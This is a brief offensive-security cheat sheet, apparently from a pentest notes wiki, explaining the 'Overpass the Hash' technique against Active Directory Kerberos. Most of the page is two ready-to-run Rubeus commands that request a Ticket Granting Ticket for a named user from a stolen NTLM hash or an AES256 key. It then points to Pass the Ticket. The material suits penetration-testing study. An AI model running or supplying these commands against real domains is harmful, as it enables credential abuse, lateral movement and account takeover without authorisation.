Overpass the Hash

"over" abuse a NLTM hash to gain full Kerberos Ticket Granting Ticket (TGT) or service ticket

Either with NTLM or AES

Rubeus.exe asktgt /user:jking /ntlm:59fc0f884922b4ce376051134c71e22c /nowrap

Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /nowrap

Resulting ticket -> Pass the Ticket

Last updated 2 years ago